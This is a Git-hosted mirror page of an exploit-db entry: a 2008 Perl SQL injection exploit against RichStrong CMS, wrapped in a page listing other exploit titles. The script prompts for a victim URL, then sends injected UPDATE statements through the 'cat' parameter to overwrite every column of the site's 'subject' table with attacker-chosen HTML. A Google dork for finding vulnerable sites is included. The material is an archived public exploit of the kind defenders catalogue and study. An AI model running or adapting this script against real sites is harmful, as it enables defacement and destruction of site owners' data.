bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/asp/webapps/4910.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

136 lines
3.4 KiB
Perl
Executable file
Raw Blame History

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: RichStrong CMS
[~] HomePage: http://www.hzrich.cn
[~] Exploit: Remote Sql Injection [High]
[~] Where: showproduct.asp?cat=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Power by:RichStrong CMS"
[~] Dork2: Priv8, xD!
[+] Tables:
[*] Table 1: subject
[+] Columns:
[*] Column 1: id
[*] Column 2: subjectname
[*] Column 3: subjecttype
[*] Column 4: displayorder
[*] Column 5: description
[*] Column 6: layout
[*] Column 7: style
[*] Column 8: category
[*] Column 9: workflowID_R
[*] Column 10: workflowID_S
[*] Column 11: status
[*] Column 12: owner
[*] Column 13: isinherit
[*] Column 14: doclistcount
[*] Column 15: docstyle
[*] Column 16: docsecrettype
[*] Column 17: docpubdays
[*] Column 18: wwwname
[*] Column 19: logo
[*] Column 20: contactus
[+] Exploit:
#!/usr/bin/perl
# RichStrong CMS - Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title RichStrong CMS - Remote SQL Injection Exploit - By JosS");
system ("color 02");
}
}
#*************************** expl ******************************
&lw;
print "\t\t########################################################\n\n";
print "\t\t# RichStrong CMS - Remote SQL Injection Exploit #\n\n";
print "\t\t# by JosS #\n\n";
print "\t\t########################################################\n\n";
print "Url Victim (Ex: www.localhost/showproduct.asp?cat=): ";
$host=<STDIN>;
chomp $host;
print "\n";
if ( $host !~ /^http:/ ) {
# lo añadimos
$host = 'http://' . $host;
}
print "Message: ";
$message=<STDIN>;
chomp $message;
print "\n";
@columnas=("id","subjectname","subjecttype","displayorder","description","layout","style","category","workflowID_R","workflowID_S","status","owner",
"isinherit","doclistcount","docstyle","docsecrettype","docpubdays","wwwname","logo","contactus");
for ($i=0;$i<=21;$i++)
{
$comando="'%20update%20subject%20set%20$columnas[$i]='<h1>$message'--";
$comando =~ s/ /+/g;
my $final = $host.$comando;
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "update: $columnas[$i]\n";
}
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# milw0rm.com [2008-01-14]
Reference in a new issue View git blame Copy permalink